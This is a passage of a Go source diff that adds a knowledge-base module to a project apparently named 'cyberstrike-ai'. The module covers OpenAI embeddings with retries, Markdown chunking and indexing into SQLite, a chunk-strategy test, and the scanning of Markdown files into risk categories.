apiKey := strings.TrimSpace(cfg.Embedding.APIKey)
|
||||
if apiKey == "" && openAIConfig != nil {
|
||||
apiKey = strings.TrimSpace(openAIConfig.APIKey)
|
||||
}
|
||||
if apiKey == "" {
|
||||
return nil, fmt.Errorf("embedding API key 未配置")
|
||||
}
|
||||
|
||||
timeout := 120 * time.Second
|
||||
if cfg.Indexing.RequestTimeoutSeconds > 0 {
|
||||
timeout = time.Duration(cfg.Indexing.RequestTimeoutSeconds) * time.Second
|
||||
}
|
||||
httpClient := &http.Client{Timeout: timeout}
|
||||
|
||||
inner, err := einoembedopenai.NewEmbedder(ctx, &einoembedopenai.EmbeddingConfig{
|
||||
APIKey: apiKey,
|
||||
BaseURL: baseURL,
|
||||
ByAzure: false,
|
||||
Model: model,
|
||||
HTTPClient: httpClient,
|
||||
})
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("eino OpenAI embedder: %w", err)
|
||||
}
|
||||
|
||||
return &Embedder{
|
||||
eino: inner,
|
||||
config: cfg,
|
||||
logger: logger,
|
||||
rateLimiter: rateLimiter,
|
||||
rateLimitDelay: rateLimitDelay,
|
||||
maxRetries: maxRetries,
|
||||
retryDelay: retryDelay,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// EmbeddingModelName 返回配置的嵌入模型名(用于 tiktoken 分块与向量行元数据)。
|
||||
func (e *Embedder) EmbeddingModelName() string {
|
||||
if e == nil || e.config == nil {
|
||||
return ""
|
||||
}
|
||||
s := strings.TrimSpace(e.config.Embedding.Model)
|
||||
if s != "" {
|
||||
return s
|
||||
}
|
||||
return "text-embedding-3-small"
|
||||
}
|
||||
|
||||
func (e *Embedder) waitRateLimiter() {
|
||||
e.mu.Lock()
|
||||
defer e.mu.Unlock()
|
||||
|
||||
if e.rateLimiter != nil {
|
||||
ctx := context.Background()
|
||||
if err := e.rateLimiter.Wait(ctx); err != nil && e.logger != nil {
|
||||
e.logger.Warn("速率限制器等待失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
if e.rateLimitDelay > 0 {
|
||||
time.Sleep(e.rateLimitDelay)
|
||||
}
|
||||
}
|
||||
|
||||
// EmbedText 单条嵌入(float32,与历史存储格式一致)。
|
||||
func (e *Embedder) EmbedText(ctx context.Context, text string) ([]float32, error) {
|
||||
vecs, err := e.EmbedStrings(ctx, []string{text})
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if len(vecs) != 1 {
|
||||
return nil, fmt.Errorf("unexpected embedding count: %d", len(vecs))
|
||||
}
|
||||
return vecs[0], nil
|
||||
}
|
||||
|
||||
// EmbedStrings 批量嵌入,带重试;实现 [embedding.Embedder],可供 Eino Indexer 使用。
|
||||
func (e *Embedder) EmbedStrings(ctx context.Context, texts []string, opts ...embedding.Option) ([][]float32, error) {
|
||||
if e == nil || e.eino == nil {
|
||||
return nil, fmt.Errorf("embedder not initialized")
|
||||
}
|
||||
if len(texts) == 0 {
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
var lastErr error
|
||||
for attempt := 0; attempt < e.maxRetries; attempt++ {
|
||||
if attempt > 0 {
|
||||
wait := e.retryDelay * time.Duration(attempt)
|
||||
if e.logger != nil {
|
||||
e.logger.Debug("嵌入重试前等待", zap.Int("attempt", attempt+1), zap.Duration("wait", wait))
|
||||
}
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return nil, ctx.Err()
|
||||
case <-time.After(wait):
|
||||
}
|
||||
} else {
|
||||
e.waitRateLimiter()
|
||||
}
|
||||
|
||||
raw, err := e.eino.EmbedStrings(ctx, texts, opts...)
|
||||
if err == nil {
|
||||
out := make([][]float32, len(raw))
|
||||
for i, row := range raw {
|
||||
out[i] = make([]float32, len(row))
|
||||
for j, v := range row {
|
||||
out[i][j] = float32(v)
|
||||
}
|
||||
}
|
||||
return out, nil
|
||||
}
|
||||
lastErr = err
|
||||
if !e.isRetryableError(err) {
|
||||
return nil, err
|
||||
}
|
||||
if e.logger != nil {
|
||||
e.logger.Debug("嵌入失败,将重试", zap.Int("attempt", attempt+1), zap.Error(err))
|
||||
}
|
||||
}
|
||||
return nil, fmt.Errorf("达到最大重试次数 (%d): %v", e.maxRetries, lastErr)
|
||||
}
|
||||
|
||||
// EmbedTexts 批量 float32 嵌入(兼容旧调用;单次请求批量以减小延迟)。
|
||||
func (e *Embedder) EmbedTexts(ctx context.Context, texts []string) ([][]float32, error) {
|
||||
return e.EmbedStrings(ctx, texts)
|
||||
}
|
||||
|
||||
func (e *Embedder) isRetryableError(err error) bool {
|
||||
if err == nil {
|
||||
return false
|
||||
}
|
||||
errStr := err.Error()
|
||||
if strings.Contains(errStr, "429") || strings.Contains(errStr, "rate limit") {
|
||||
return true
|
||||
}
|
||||
if strings.Contains(errStr, "500") || strings.Contains(errStr, "502") ||
|
||||
strings.Contains(errStr, "503") || strings.Contains(errStr, "504") {
|
||||
return true
|
||||
}
|
||||
if strings.Contains(errStr, "timeout") || strings.Contains(errStr, "connection") ||
|
||||
strings.Contains(errStr, "network") || strings.Contains(errStr, "EOF") {
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// einoFloatEmbedder adapts [][]float32 embedder to Eino's [][]float64 [embedding.Embedder] for Indexer.Store.
|
||||
type einoFloatEmbedder struct {
|
||||
inner *Embedder
|
||||
}
|
||||
|
||||
func (w *einoFloatEmbedder) EmbedStrings(ctx context.Context, texts []string, opts ...embedding.Option) ([][]float64, error) {
|
||||
vec32, err := w.inner.EmbedStrings(ctx, texts, opts...)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
out := make([][]float64, len(vec32))
|
||||
for i, row := range vec32 {
|
||||
out[i] = make([]float64, len(row))
|
||||
for j, v := range row {
|
||||
out[i][j] = float64(v)
|
||||
}
|
||||
}
|
||||
return out, nil
|
||||
}
|
||||
|
||||
func (w *einoFloatEmbedder) GetType() string {
|
||||
return "CyberStrikeKnowledgeEmbedder"
|
||||
}
|
||||
|
||||
func (w *einoFloatEmbedder) IsCallbacksEnabled() bool {
|
||||
return false
|
||||
}
|
||||
|
||||
// EinoEmbeddingComponent returns an [embedding.Embedder] that uses the same retry/rate-limit path
|
||||
// and produces float64 vectors expected by generic Eino indexer helpers.
|
||||
func (e *Embedder) EinoEmbeddingComponent() embedding.Embedder {
|
||||
return &einoFloatEmbedder{inner: e}
|
||||
}
|
||||
@@ -0,0 +1,91 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"database/sql"
|
||||
"fmt"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"github.com/cloudwego/eino/components/document"
|
||||
"github.com/cloudwego/eino/compose"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
)
|
||||
|
||||
// normalizeChunkStrategy returns "recursive" or "markdown_then_recursive".
|
||||
func normalizeChunkStrategy(s string) string {
|
||||
v := strings.TrimSpace(strings.ToLower(s))
|
||||
switch v {
|
||||
case "recursive":
|
||||
return "recursive"
|
||||
case "markdown_then_recursive", "markdown_recursive", "markdown":
|
||||
return "markdown_then_recursive"
|
||||
case "":
|
||||
return "markdown_then_recursive"
|
||||
default:
|
||||
return "markdown_then_recursive"
|
||||
}
|
||||
}
|
||||
|
||||
func buildKnowledgeIndexChain(
|
||||
ctx context.Context,
|
||||
indexingCfg *config.IndexingConfig,
|
||||
db *sql.DB,
|
||||
recursive document.Transformer,
|
||||
embeddingModel string,
|
||||
) (compose.Runnable[[]*schema.Document, []string], error) {
|
||||
if recursive == nil {
|
||||
return nil, fmt.Errorf("recursive transformer is nil")
|
||||
}
|
||||
if db == nil {
|
||||
return nil, fmt.Errorf("db is nil")
|
||||
}
|
||||
strategy := normalizeChunkStrategy("markdown_then_recursive")
|
||||
batch := 64
|
||||
maxChunks := 0
|
||||
if indexingCfg != nil {
|
||||
strategy = normalizeChunkStrategy(indexingCfg.ChunkStrategy)
|
||||
if indexingCfg.BatchSize > 0 {
|
||||
batch = indexingCfg.BatchSize
|
||||
}
|
||||
maxChunks = indexingCfg.MaxChunksPerItem
|
||||
}
|
||||
|
||||
si := NewSQLiteIndexer(db, batch, embeddingModel)
|
||||
ch := compose.NewChain[[]*schema.Document, []string]()
|
||||
if strategy != "recursive" {
|
||||
md, err := newMarkdownHeaderSplitter(ctx)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("markdown splitter: %w", err)
|
||||
}
|
||||
ch.AppendDocumentTransformer(md)
|
||||
}
|
||||
ch.AppendDocumentTransformer(recursive)
|
||||
ch.AppendLambda(newChunkEnrichLambda(maxChunks))
|
||||
ch.AppendIndexer(si)
|
||||
return ch.Compile(ctx)
|
||||
}
|
||||
|
||||
func newChunkEnrichLambda(maxChunks int) *compose.Lambda {
|
||||
return compose.InvokableLambda(func(ctx context.Context, docs []*schema.Document) ([]*schema.Document, error) {
|
||||
_ = ctx
|
||||
out := make([]*schema.Document, 0, len(docs))
|
||||
for _, d := range docs {
|
||||
if d == nil || strings.TrimSpace(d.Content) == "" {
|
||||
continue
|
||||
}
|
||||
out = append(out, d)
|
||||
}
|
||||
if maxChunks > 0 && len(out) > maxChunks {
|
||||
out = out[:maxChunks]
|
||||
}
|
||||
for i, d := range out {
|
||||
if d.MetaData == nil {
|
||||
d.MetaData = make(map[string]any)
|
||||
}
|
||||
d.MetaData[metaKBChunkIndex] = i
|
||||
}
|
||||
return out, nil
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,21 @@
|
||||
package knowledge
|
||||
|
||||
import "testing"
|
||||
|
||||
func TestNormalizeChunkStrategy(t *testing.T) {
|
||||
cases := []struct {
|
||||
in, want string
|
||||
}{
|
||||
{"", "markdown_then_recursive"},
|
||||
{"recursive", "recursive"},
|
||||
{"RECURSIVE", "recursive"},
|
||||
{"markdown_then_recursive", "markdown_then_recursive"},
|
||||
{"markdown", "markdown_then_recursive"},
|
||||
{"unknown", "markdown_then_recursive"},
|
||||
}
|
||||
for _, tc := range cases {
|
||||
if got := normalizeChunkStrategy(tc.in); got != tc.want {
|
||||
t.Errorf("normalizeChunkStrategy(%q) = %q, want %q", tc.in, got, tc.want)
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,352 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"context"
|
||||
"database/sql"
|
||||
"fmt"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
fileloader "github.com/cloudwego/eino-ext/components/document/loader/file"
|
||||
"github.com/cloudwego/eino/components/document"
|
||||
"github.com/cloudwego/eino/components/indexer"
|
||||
"github.com/cloudwego/eino/compose"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Indexer 使用 Eino Compose 索引链(Markdown/递归分块、Lambda enrich、SQLite 索引)与嵌入写入。
|
||||
type Indexer struct {
|
||||
db *sql.DB
|
||||
embedder *Embedder
|
||||
logger *zap.Logger
|
||||
chunkSize int
|
||||
overlap int
|
||||
indexingCfg *config.IndexingConfig
|
||||
|
||||
indexChain compose.Runnable[[]*schema.Document, []string]
|
||||
fileLoader *fileloader.FileLoader
|
||||
|
||||
mu sync.RWMutex
|
||||
lastError string
|
||||
lastErrorTime time.Time
|
||||
errorCount int
|
||||
|
||||
rebuildMu sync.RWMutex
|
||||
isRebuilding bool
|
||||
rebuildTotalItems int
|
||||
rebuildCurrent int
|
||||
rebuildFailed int
|
||||
rebuildStartTime time.Time
|
||||
rebuildLastItemID string
|
||||
rebuildLastChunks int
|
||||
}
|
||||
|
||||
// NewIndexer 创建索引器并编译 Eino 索引链;kcfg 为完整知识库配置(含 indexing 与路径相关行为)。
|
||||
func NewIndexer(ctx context.Context, db *sql.DB, embedder *Embedder, logger *zap.Logger, kcfg *config.KnowledgeConfig) (*Indexer, error) {
|
||||
if db == nil {
|
||||
return nil, fmt.Errorf("db is nil")
|
||||
}
|
||||
if embedder == nil {
|
||||
return nil, fmt.Errorf("embedder is nil")
|
||||
}
|
||||
if err := EnsureKnowledgeEmbeddingsSchema(db); err != nil {
|
||||
return nil, fmt.Errorf("knowledge_embeddings 结构迁移: %w", err)
|
||||
}
|
||||
if kcfg == nil {
|
||||
kcfg = &config.KnowledgeConfig{}
|
||||
}
|
||||
indexingCfg := &kcfg.Indexing
|
||||
|
||||
chunkSize := 512
|
||||
overlap := 50
|
||||
if indexingCfg.ChunkSize > 0 {
|
||||
chunkSize = indexingCfg.ChunkSize
|
||||
}
|
||||
if indexingCfg.ChunkOverlap >= 0 {
|
||||
overlap = indexingCfg.ChunkOverlap
|
||||
}
|
||||
|
||||
embedModel := embedder.EmbeddingModelName()
|
||||
splitter, err := newKnowledgeSplitter(chunkSize, overlap, embedModel)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("eino recursive splitter: %w", err)
|
||||
}
|
||||
|
||||
chain, err := buildKnowledgeIndexChain(ctx, indexingCfg, db, splitter, embedModel)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("knowledge index chain: %w", err)
|
||||
}
|
||||
|
||||
var fl *fileloader.FileLoader
|
||||
fl, err = fileloader.NewFileLoader(ctx, nil)
|
||||
if err != nil {
|
||||
if logger != nil {
|
||||
logger.Warn("Eino FileLoader 初始化失败,prefer_source_file 将回退数据库正文", zap.Error(err))
|
||||
}
|
||||
fl = nil
|
||||
err = nil
|
||||
}
|
||||
|
||||
return &Indexer{
|
||||
db: db,
|
||||
embedder: embedder,
|
||||
logger: logger,
|
||||
chunkSize: chunkSize,
|
||||
overlap: overlap,
|
||||
indexingCfg: indexingCfg,
|
||||
indexChain: chain,
|
||||
fileLoader: fl,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// RecompileIndexChain 在配置或嵌入模型变更后重建 Eino 索引链(无需重启进程)。
|
||||
func (idx *Indexer) RecompileIndexChain(ctx context.Context) error {
|
||||
if idx == nil || idx.db == nil || idx.embedder == nil {
|
||||
return fmt.Errorf("indexer 未初始化")
|
||||
}
|
||||
if err := EnsureKnowledgeEmbeddingsSchema(idx.db); err != nil {
|
||||
return err
|
||||
}
|
||||
embedModel := idx.embedder.EmbeddingModelName()
|
||||
splitter, err := newKnowledgeSplitter(idx.chunkSize, idx.overlap, embedModel)
|
||||
if err != nil {
|
||||
return fmt.Errorf("eino recursive splitter: %w", err)
|
||||
}
|
||||
chain, err := buildKnowledgeIndexChain(ctx, idx.indexingCfg, idx.db, splitter, embedModel)
|
||||
if err != nil {
|
||||
return fmt.Errorf("knowledge index chain: %w", err)
|
||||
}
|
||||
idx.indexChain = chain
|
||||
return nil
|
||||
}
|
||||
|
||||
// IndexItem 索引单个知识项:先清空旧向量,再走 Compose 链(分块、嵌入、写入)。
|
||||
func (idx *Indexer) IndexItem(ctx context.Context, itemID string) error {
|
||||
if idx.indexChain == nil {
|
||||
return fmt.Errorf("索引链未初始化")
|
||||
}
|
||||
if idx.embedder == nil {
|
||||
return fmt.Errorf("嵌入器未初始化")
|
||||
}
|
||||
|
||||
var content, category, title, filePath string
|
||||
err := idx.db.QueryRow("SELECT content, category, title, file_path FROM knowledge_base_items WHERE id = ?", itemID).Scan(&content, &category, &title, &filePath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("获取知识项失败:%w", err)
|
||||
}
|
||||
|
||||
if _, err := idx.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", itemID); err != nil {
|
||||
return fmt.Errorf("删除旧向量失败:%w", err)
|
||||
}
|
||||
|
||||
body := strings.TrimSpace(content)
|
||||
if idx.indexingCfg != nil && idx.indexingCfg.PreferSourceFile && strings.TrimSpace(filePath) != "" && idx.fileLoader != nil {
|
||||
docs, lerr := idx.fileLoader.Load(ctx, document.Source{URI: strings.TrimSpace(filePath)})
|
||||
if lerr == nil && len(docs) > 0 {
|
||||
var b strings.Builder
|
||||
for i, d := range docs {
|
||||
if d == nil {
|
||||
continue
|
||||
}
|
||||
if i > 0 {
|
||||
b.WriteString("\n\n")
|
||||
}
|
||||
b.WriteString(d.Content)
|
||||
}
|
||||
if s := strings.TrimSpace(b.String()); s != "" {
|
||||
body = s
|
||||
}
|
||||
} else if idx.logger != nil {
|
||||
idx.logger.Warn("优先源文件读取失败,使用数据库正文",
|
||||
zap.String("itemId", itemID),
|
||||
zap.String("path", filePath),
|
||||
zap.Error(lerr))
|
||||
}
|
||||
}
|
||||
|
||||
root := &schema.Document{
|
||||
ID: itemID,
|
||||
Content: body,
|
||||
MetaData: map[string]any{
|
||||
metaKBCategory: category,
|
||||
metaKBTitle: title,
|
||||
metaKBItemID: itemID,
|
||||
},
|
||||
}
|
||||
|
||||
idxOpts := []indexer.Option{indexer.WithEmbedding(idx.embedder.EinoEmbeddingComponent())}
|
||||
if idx.indexingCfg != nil && len(idx.indexingCfg.SubIndexes) > 0 {
|
||||
idxOpts = append(idxOpts, indexer.WithSubIndexes(idx.indexingCfg.SubIndexes))
|
||||
}
|
||||
|
||||
ids, err := idx.indexChain.Invoke(ctx, []*schema.Document{root}, compose.WithIndexerOption(idxOpts...))
|
||||
if err != nil {
|
||||
msg := fmt.Sprintf("索引写入失败 (知识项:%s): %v", itemID, err)
|
||||
idx.mu.Lock()
|
||||
idx.lastError = msg
|
||||
idx.lastErrorTime = time.Now()
|
||||
idx.mu.Unlock()
|
||||
return err
|
||||
}
|
||||
|
||||
if idx.logger != nil {
|
||||
idx.logger.Info("知识项索引完成", zap.String("itemId", itemID), zap.Int("chunks", len(ids)))
|
||||
}
|
||||
idx.rebuildMu.Lock()
|
||||
idx.rebuildLastItemID = itemID
|
||||
idx.rebuildLastChunks = len(ids)
|
||||
idx.rebuildMu.Unlock()
|
||||
return nil
|
||||
}
|
||||
|
||||
// HasIndex 检查是否存在索引
|
||||
func (idx *Indexer) HasIndex() (bool, error) {
|
||||
var count int
|
||||
err := idx.db.QueryRow("SELECT COUNT(*) FROM knowledge_embeddings").Scan(&count)
|
||||
if err != nil {
|
||||
return false, fmt.Errorf("检查索引失败:%w", err)
|
||||
}
|
||||
return count > 0, nil
|
||||
}
|
||||
|
||||
// RebuildIndex 重建所有索引
|
||||
func (idx *Indexer) RebuildIndex(ctx context.Context) error {
|
||||
idx.rebuildMu.Lock()
|
||||
idx.isRebuilding = true
|
||||
idx.rebuildTotalItems = 0
|
||||
idx.rebuildCurrent = 0
|
||||
idx.rebuildFailed = 0
|
||||
idx.rebuildStartTime = time.Now()
|
||||
idx.rebuildLastItemID = ""
|
||||
idx.rebuildLastChunks = 0
|
||||
idx.rebuildMu.Unlock()
|
||||
|
||||
idx.mu.Lock()
|
||||
idx.lastError = ""
|
||||
idx.lastErrorTime = time.Time{}
|
||||
idx.errorCount = 0
|
||||
idx.mu.Unlock()
|
||||
|
||||
rows, err := idx.db.Query("SELECT id FROM knowledge_base_items")
|
||||
if err != nil {
|
||||
idx.rebuildMu.Lock()
|
||||
idx.isRebuilding = false
|
||||
idx.rebuildMu.Unlock()
|
||||
return fmt.Errorf("查询知识项失败:%w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var itemIDs []string
|
||||
for rows.Next() {
|
||||
var id string
|
||||
if err := rows.Scan(&id); err != nil {
|
||||
idx.rebuildMu.Lock()
|
||||
idx.isRebuilding = false
|
||||
idx.rebuildMu.Unlock()
|
||||
return fmt.Errorf("扫描知识项 ID 失败:%w", err)
|
||||
}
|
||||
itemIDs = append(itemIDs, id)
|
||||
}
|
||||
|
||||
idx.rebuildMu.Lock()
|
||||
idx.rebuildTotalItems = len(itemIDs)
|
||||
idx.rebuildMu.Unlock()
|
||||
|
||||
idx.logger.Info("开始重建索引", zap.Int("totalItems", len(itemIDs)))
|
||||
|
||||
failedCount := 0
|
||||
consecutiveFailures := 0
|
||||
maxConsecutiveFailures := 5
|
||||
firstFailureItemID := ""
|
||||
var firstFailureError error
|
||||
|
||||
for i, itemID := range itemIDs {
|
||||
if err := idx.IndexItem(ctx, itemID); err != nil {
|
||||
failedCount++
|
||||
consecutiveFailures++
|
||||
|
||||
if consecutiveFailures == 1 {
|
||||
firstFailureItemID = itemID
|
||||
firstFailureError = err
|
||||
idx.logger.Warn("索引知识项失败",
|
||||
zap.String("itemId", itemID),
|
||||
zap.Int("totalItems", len(itemIDs)),
|
||||
zap.Error(err),
|
||||
)
|
||||
}
|
||||
|
||||
if consecutiveFailures >= maxConsecutiveFailures {
|
||||
errorMsg := fmt.Sprintf("连续 %d 个知识项索引失败,可能存在配置问题(如嵌入模型配置错误、API 密钥无效、余额不足等)。第一个失败项:%s, 错误:%v", consecutiveFailures, firstFailureItemID, firstFailureError)
|
||||
idx.mu.Lock()
|
||||
idx.lastError = errorMsg
|
||||
idx.lastErrorTime = time.Now()
|
||||
idx.mu.Unlock()
|
||||
|
||||
idx.logger.Error("连续索引失败次数过多,立即停止索引",
|
||||
zap.Int("consecutiveFailures", consecutiveFailures),
|
||||
zap.Int("totalItems", len(itemIDs)),
|
||||
zap.Int("processedItems", i+1),
|
||||
zap.String("firstFailureItemId", firstFailureItemID),
|
||||
zap.Error(firstFailureError),
|
||||
)
|
||||
return fmt.Errorf("连续索引失败次数过多:%v", firstFailureError)
|
||||
}
|
||||
|
||||
if failedCount > len(itemIDs)*3/10 && failedCount == len(itemIDs)*3/10+1 {
|
||||
errorMsg := fmt.Sprintf("索引失败的知识项过多 (%d/%d),可能存在配置问题。第一个失败项:%s, 错误:%v", failedCount, len(itemIDs), firstFailureItemID, firstFailureError)
|
||||
idx.mu.Lock()
|
||||
idx.lastError = errorMsg
|
||||
idx.lastErrorTime = time.Now()
|
||||
idx.mu.Unlock()
|
||||
|
||||
idx.logger.Error("索引失败的知识项过多,可能存在配置问题",
|
||||
zap.Int("failedCount", failedCount),
|
||||
zap.Int("totalItems", len(itemIDs)),
|
||||
zap.String("firstFailureItemId", firstFailureItemID),
|
||||
zap.Error(firstFailureError),
|
||||
)
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
if consecutiveFailures > 0 {
|
||||
consecutiveFailures = 0
|
||||
firstFailureItemID = ""
|
||||
firstFailureError = nil
|
||||
}
|
||||
|
||||
idx.rebuildMu.Lock()
|
||||
idx.rebuildCurrent = i + 1
|
||||
idx.rebuildFailed = failedCount
|
||||
idx.rebuildMu.Unlock()
|
||||
|
||||
if (i+1)%10 == 0 || (len(itemIDs) > 0 && (i+1)*100/len(itemIDs)%10 == 0 && (i+1)*100/len(itemIDs) > 0) {
|
||||
idx.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemIDs)), zap.Int("failed", failedCount))
|
||||
}
|
||||
}
|
||||
|
||||
idx.rebuildMu.Lock()
|
||||
idx.isRebuilding = false
|
||||
idx.rebuildMu.Unlock()
|
||||
|
||||
idx.logger.Info("索引重建完成", zap.Int("totalItems", len(itemIDs)), zap.Int("failedCount", failedCount))
|
||||
return nil
|
||||
}
|
||||
|
||||
// GetLastError 获取最近一次错误信息
|
||||
func (idx *Indexer) GetLastError() (string, time.Time) {
|
||||
idx.mu.RLock()
|
||||
defer idx.mu.RUnlock()
|
||||
return idx.lastError, idx.lastErrorTime
|
||||
}
|
||||
|
||||
// GetRebuildStatus 获取重建索引状态
|
||||
func (idx *Indexer) GetRebuildStatus() (isRebuilding bool, totalItems int, current int, failed int, lastItemID string, lastChunks int, startTime time.Time) {
|
||||
idx.rebuildMu.RLock()
|
||||
defer idx.rebuildMu.RUnlock()
|
||||
return idx.isRebuilding, idx.rebuildTotalItems, idx.rebuildCurrent, idx.rebuildFailed, idx.rebuildLastItemID, idx.rebuildLastChunks, idx.rebuildStartTime
|
||||
}
|
||||
@@ -0,0 +1,885 @@
|
||||
package knowledge
|
||||
|
||||
import (
|
||||
"database/sql"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io/fs"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/google/uuid"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Manager 知识库管理器
|
||||
type Manager struct {
|
||||
db *sql.DB
|
||||
basePath string
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// NewManager 创建新的知识库管理器
|
||||
func NewManager(db *sql.DB, basePath string, logger *zap.Logger) *Manager {
|
||||
return &Manager{
|
||||
db: db,
|
||||
basePath: basePath,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
// ScanKnowledgeBase 扫描知识库目录,更新数据库
|
||||
// 返回需要索引的知识项ID列表(新添加的或更新的)
|
||||
func (m *Manager) ScanKnowledgeBase() ([]string, error) {
|
||||
if m.basePath == "" {
|
||||
return nil, fmt.Errorf("知识库路径未配置")
|
||||
}
|
||||
|
||||
// 确保目录存在
|
||||
if err := os.MkdirAll(m.basePath, 0755); err != nil {
|
||||
return nil, fmt.Errorf("创建知识库目录失败: %w", err)
|
||||
}
|
||||
|
||||
var itemsToIndex []string
|
||||
|
||||
// 遍历知识库目录
|
||||
err := filepath.WalkDir(m.basePath, func(path string, d fs.DirEntry, err error) error {
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// 跳过目录和非markdown文件
|
||||
if d.IsDir() || !strings.HasSuffix(strings.ToLower(path), ".md") {
|
||||
return nil
|
||||
}
|
||||
|
||||
// 计算相对路径和分类
|
||||
relPath, err := filepath.Rel(m.basePath, path)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// 第一个目录名作为分类(风险类型)
|
||||
parts := strings.Split(relPath, string(filepath.Separator))
|
||||
category := "未分类"
|
||||
if len(parts) > 1 {
|
||||
category = parts[0]
|
||||
}
|
||||
|
||||
// 文件名为标题
|
||||
title := strings.TrimSuffix(filepath.Base(path), ".md")
|
||||
|
||||
// 读取文件内容
|
||||
content, err := os.ReadFile(path)
|
||||
if err != nil {
|
||||
m.logger.Warn("读取知识库文件失败", zap.String("path", path), zap.Error(err))
|
||||
return nil // 继续处理其他文件
|
||||
}
|
||||
|
||||
// 检查是否已存在
|
||||
var existingID string
|
||||
var existingContent string
|
||||
var existingUpdatedAt time.Time
|
||||
err = m.db.QueryRow(
|
||||
"SELECT id, content, updated_at FROM knowledge_base_items WHERE file_path = ?",
|
||||
path,
|
||||
).Scan(&existingID, &existingContent, &existingUpdatedAt)
|
||||
|
||||
if err == sql.ErrNoRows {
|
||||
// 创建新项
|
||||
id := uuid.New().String()
|
||||
now := time.Now()
|
||||
_, err = m.db.Exec(
|
||||
"INSERT INTO knowledge_base_items (id, category, title, file_path, content, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)",
|
||||
id, category, title, path, string(content), now, now,
|
||||
)
|
||||
if err != nil {
|
||||
return fmt.Errorf("插入知识项失败: %w", err)
|
||||
}
|
||||
m.logger.Info("添加知识项", zap.String("id", id), zap.String("title", title), zap.String("category", category))
|
||||
// 新添加的项需要索引
|
||||
itemsToIndex = append(itemsToIndex, id)
|
||||
} else if err == nil {
|
||||
// 检查内容是否有变化
|
||||
contentChanged := existingContent != string(content)
|
||||
if contentChanged {
|
||||
// 更新现有项
|
||||
_, err = m.db.Exec(
|
||||
"UPDATE knowledge_base_items SET category = ?, title = ?, content = ?, updated_at = ? WHERE id = ?",
|
||||
category, title, string(content), time.Now(), existingID,
|
||||
)
|
||||
if err != nil {
|
||||
return fmt.Errorf("更新知识项失败: %w", err)
|
||||
}
|
||||
m.logger.Info("更新知识项", zap.String("id", existingID), zap.String("title", title))
|
||||
// 内容已更新的项需要重新索引
|
||||
itemsToIndex = append(itemsToIndex, existingID)
|
||||
} else {
|
||||
m.logger.Debug("知识项未变化,跳过", zap.String("id", existingID), zap.String("title", title))
|
||||
}
|
||||
} else {
|
||||
return fmt.Errorf("查询知识项失败: %w", err)
|
||||
}
|
||||
|
||||
return nil
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return itemsToIndex, nil
|
||||
}
|
||||
|
||||
// GetCategories 获取所有分类(风险类型)
|
||||
func (m *Manager) GetCategories() ([]string, error) {
|
||||
rows, err := m.db.Query("SELECT DISTINCT category FROM knowledge_base_items ORDER BY category")
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("查询分类失败: %w", err)
|
||||
}
|
||||
defer rows.Close()
|
||||
|
||||
var categories []string
|
||||
for rows.Next() {
|
||||
var category string
|
||||
if err := rows.Scan(&category); err != nil {
|
||||
return nil, fmt.Errorf("扫描分类失败: %w", err)
|
||||
}
|
||||
categories = append(categories, category)
|
||||
}
|
||||
|
||||
return categories, nil
|
||||
}
|
||||
|
||||
// GetStats 获取知识库统计信息
|
||||
func (m *Manager) GetStats() (int, int, error) {
|
||||
// 获取分类总数
|
||||
categories, err := m.GetCategories()
|
||||
if err != nil {
|
||||
return 0, 0, fmt.Errorf("获取分类失败: %w", err)
|
||||
}
|
||||
totalCategories := len(categories)
|
||||
|
||||
// 获取知识项总数
|
||||
var totalItems int
|
||||
err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems)
|
||||
if err != nil {
|
||||
return totalCategories, 0, fmt.Errorf("获取知识项总数失败: %w", err)
|
||||
}
|
||||
|
||||
return totalCategories, totalItems, nil
|
||||
}
|
||||
|
||||
// GetCategoriesWithItems 按分类分页获取知识项(每个分类包含其下的所有知识项)
|
||||
// limit: 每页分类数量(0表示不限制)
|
||||
// offset: 偏移量(按分类偏移)
|
||||
func (m *Manager) GetCategoriesWithItems(limit, offset int) ([]*CategoryWithItems, int, error) {
|
||||
// 首先获取所有分类(带数量统计)
|
||||
rows, err := m.db.Query(`
|
||||
SELECT category, COUNT(*) as item_count
|
||||
FROM knowledge_base_items
|
||||
GROUP BY category
